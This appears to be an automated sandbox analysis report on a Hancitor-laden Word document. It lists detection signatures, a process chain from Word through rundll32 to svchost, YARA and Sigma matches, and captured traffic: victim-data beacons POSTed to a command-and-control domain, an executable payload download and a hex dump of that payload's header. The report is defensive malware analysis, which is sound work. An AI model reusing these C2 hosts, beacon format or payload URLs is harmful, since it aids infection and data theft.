Loading ...

Play interactive tourEdit tour

Analysis Report 1118_8732615.doc

Overview

General Information

Sample Name:1118_8732615.doc
Analysis ID:319766
MD5:0f75ad40daec01aee7642795cc544bb3
SHA1:76334ccc6e92d579495671de47664180517cdf05
SHA256:afba9deb16b5100c5964ca33cd42c2aa6b972ad104efd3d58e0ad8b7070cd5f4
Tags:docHancitormacros

Most interesting Screenshot:

Detection

Hidden Macro 4.0 Hancitor
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Document exploit detected (drops PE files)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
System process connects to network (likely due to code injection or exploit)
Yara detected Hancitor
Allocates memory in foreign processes
Contains functionality to inject threads in other processes
Document contains an embedded VBA macro which may execute processes
Document contains an embedded VBA macro with suspicious strings
Document exploit detected (process start blacklist hit)
Machine Learning detection for sample
May check the online IP address of the machine
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Suspicious Svchost Process
Yara detected hidden Macro 4.0 in Excel
Allocates a big amount of memory (probably used for heap spraying)
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Downloads executable code via HTTP
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Tries to load missing DLLs
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • WINWORD.EXE (PID: 6580 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE' /Automation -Embedding MD5: 0B9AB9B9C4DE429473D6450D4297A123)
    • splwow64.exe (PID: 6696 cmdline: C:\Windows\splwow64.exe 12288 MD5: 8D59B31FF375059E3C32B17BF31A76D5)
    • rundll32.exe (PID: 6848 cmdline: 'C:\Windows\System32\rundll32.exe' C:\Users\user\AppData\Roaming\Microsoft\Templates\W0rd.dll,Start MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • svchost.exe (PID: 5364 cmdline: C:\Windows\System32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
1118_8732615.docJoeSecurity_HiddenMacroYara detected hidden Macro 4.0 in ExcelJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    Process Memory Space: rundll32.exe PID: 6848JoeSecurity_HancitorYara detected HancitorJoe Security

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      3.2.rundll32.exe.6f830000.2.unpackHancitorHancitor Payloadkevoreilly
      • 0x116f:$decrypt3: 8B 45 FC 33 D2 B9 08 00 00 00 F7 F1 8B 45 08 0F BE 0C 10 8B 55 08 03 55 FC 0F BE 02 33 C1 8B 4D ...

      Sigma Overview

      System Summary:

      barindex
      Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
      Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis: Data: Command: 'C:\Windows\System32\rundll32.exe' C:\Users\user\AppData\Roaming\Microsoft\Templates\W0rd.dll,Start, CommandLine: 'C:\Windows\System32\rundll32.exe' C:\Users\user\AppData\Roaming\Microsoft\Templates\W0rd.dll,Start, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE' /Automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE, ParentProcessId: 6580, ProcessCommandLine: 'C:\Windows\System32\rundll32.exe' C:\Users\user\AppData\Roaming\Microsoft\Templates\W0rd.dll,Start, ProcessId: 6848
      Sigma detected: Suspicious Svchost ProcessShow sources
      Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\System32\svchost.exe, CommandLine: C:\Windows\System32\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: 'C:\Windows\System32\rundll32.exe' C:\Users\user\AppData\Roaming\Microsoft\Templates\W0rd.dll,Start, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 6848, ProcessCommandLine: C:\Windows\System32\svchost.exe, ProcessId: 5364

      Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Multi AV Scanner detection for submitted fileShow sources
      Source: 1118_8732615.docVirustotal: Detection: 15%Perma Link
      Source: 1118_8732615.docReversingLabs: Detection: 12%
      Source: 1118_8732615.docVirustotal: Detection: 15%Perma Link
      Source: 1118_8732615.docReversingLabs: Detection: 12%
      Machine Learning detection for sampleShow sources
      Source: 1118_8732615.docJoe Sandbox ML: detected
      Source: 1118_8732615.docJoe Sandbox ML: detected
      Source: 3.2.rundll32.exe.6f830000.2.unpackAvira: Label: TR/Hijacker.Gen
      Source: 3.2.rundll32.exe.6f830000.2.unpackAvira: Label: TR/Hijacker.Gen

      Location Tracking:

      barindex
      Yara detected HancitorShow sources
      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6848, type: MEMORY
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6F832CD0 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDecrypt,CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,3_2_6F832CD0
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6F832D17 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,3_2_6F832D17
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6F832D98 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,3_2_6F832D98
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6F832D55 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,3_2_6F832D55
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6F832D78 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,3_2_6F832D78
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6F832CD0 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDecrypt,CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,3_2_6F832CD0
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6F832D17 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,3_2_6F832D17
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6F832D98 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,3_2_6F832D98
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6F832D55 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,3_2_6F832D55
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6F832D78 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,3_2_6F832D78
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6F864250 FindFirstFileExA,3_2_6F864250
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6F864250 FindFirstFileExA,3_2_6F864250

      Software Vulnerabilities:

      barindex
      Document exploit detected (drops PE files)Show sources
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile created: 22.mp4.0.drJump to dropped file
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile created: 22.mp4.0.drJump to dropped file
      Document exploit detected (process start blacklist hit)Show sources
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\rundll32.exeJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\rundll32.exeJump to behavior
      Source: winword.exeMemory has grown: Private usage: 0MB later: 73MB
      Source: winword.exeMemory has grown: Private usage: 0MB later: 73MB
      Source: global trafficDNS query: name: api.ipify.org
      Source: global trafficDNS query: name: api.ipify.org
      Source: global trafficTCP traffic: 192.168.2.7:49731 -> 54.235.142.93:80
      Source: global trafficTCP traffic: 192.168.2.7:49731 -> 54.235.142.93:80
      Source: global trafficTCP traffic: 192.168.2.7:49731 -> 54.235.142.93:80
      Source: global trafficTCP traffic: 192.168.2.7:49731 -> 54.235.142.93:80

      Networking:

      barindex
      May check the online IP address of the machineShow sources
      Source: unknownDNS query: name: api.ipify.org
      Source: unknownDNS query: name: api.ipify.org
      Source: unknownDNS query: name: api.ipify.org
      Source: unknownDNS query: name: api.ipify.org
      Source: unknownDNS query: name: api.ipify.org
      Source: unknownDNS query: name: api.ipify.org
      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 18 Nov 2020 15:34:59 GMTContent-Type: application/octet-streamContent-Length: 272910Connection: keep-aliveLast-Modified: Tue, 10 Nov 2020 13:28:24 GMTETag: "5faa9578-42a0e"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 00 00 00 00 00 2a 04 00 00 00 00 00 e0 00 2f 03 0b 01 02 1e 00 50 03 00 00 26 04 00 00 06 00 00 80 14 00 00 00 10 00 00 00 60 03 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 80 04 00 00 04 00 00 f5 ea 04 00 02 00 00 01 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 50 04 00 a4 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b4 9b 03 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b4 52 04 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b4 4e 03 00 00 10 00 00 00 50 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 38 00 00 00 00 60 03 00 00 02 00 00 00 54 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 c0 2e 72 64 61 74 61 00 00 f8 2d 00 00 00 70 03 00 00 2e 00 00 00 56 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 40 2f 34 00 00 00 00 00 00 14 90 00 00 00 a0 03 00 00 92 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 62 73 73 00 00 00 00 40 04 00 00 00 40 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 69 64 61 74 61 00 00 a4 0e 00 00 00 50 04 00 00 10 00 00 00 16 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 38 00 00 00 00 60 04 00 00 02 00 00 00 26 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 08 00 00 00 00 70 04 00 00 02 00 00 00 28 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 18 Nov 2020 15:34:59 GMTContent-Type: application/octet-streamContent-Length: 272910Connection: keep-aliveLast-Modified: Tue, 10 Nov 2020 13:28:24 GMTETag: "5faa9578-42a0e"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 00 00 00 00 00 2a 04 00 00 00 00 00 e0 00 2f 03 0b 01 02 1e 00 50 03 00 00 26 04 00 00 06 00 00 80 14 00 00 00 10 00 00 00 60 03 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 80 04 00 00 04 00 00 f5 ea 04 00 02 00 00 01 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 50 04 00 a4 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b4 9b 03 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b4 52 04 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b4 4e 03 00 00 10 00 00 00 50 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 38 00 00 00 00 60 03 00 00 02 00 00 00 54 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 c0 2e 72 64 61 74 61 00 00 f8 2d 00 00 00 70 03 00 00 2e 00 00 00 56 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 40 2f 34 00 00 00 00 00 00 14 90 00 00 00 a0 03 00 00 92 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 62 73 73 00 00 00 00 40 04 00 00 00 40 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 69 64 61 74 61 00 00 a4 0e 00 00 00 50 04 00 00 10 00 00 00 16 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 38 00 00 00 00 60 04 00 00 02 00 00 00 26 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 08 00 00 00 00 70 04 00 00 02 00 00 00 28 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      Source: Joe Sandbox ViewIP Address: 54.235.142.93 54.235.142.93
      Source: Joe Sandbox ViewIP Address: 54.235.142.93 54.235.142.93
      Source: Joe Sandbox ViewIP Address: 54.235.142.93 54.235.142.93
      Source: Joe Sandbox ViewIP Address: 54.235.142.93 54.235.142.93
      Source: Joe Sandbox ViewASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
      Source: Joe Sandbox ViewASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
      Source: Joe Sandbox ViewASN Name: ITL-BG ITL-BG
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: */*User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: api.ipify.orgCache-Control: no-cache
      Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
      Source: global trafficHTTP traffic detected: GET /f44.exe HTTP/1.1Accept: */*User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sturtevantforcongress.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
      Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
      Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
      Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
      Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
      Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
      Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
      Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
      Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
      Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: duarreecto.ruContent-Length: 120Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 30 31 31 38 36 39 34 30 30 32 33 37 39 39 37 37 39 36 34 26 42 55 49 4c 44 3d 31 38 31 31 5f 65 64 26 49 4e 46 4f 3d 36 33 32 39 32 32 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 66 72 6f 6e 74 64 65 73 6b 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 34 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=10118694002379977964&BUILD=1811_ed&INFO=632922 @ computer\user&EXT=&IP=84.17.52.40&TYPE=1&WIN=10.0(x64)
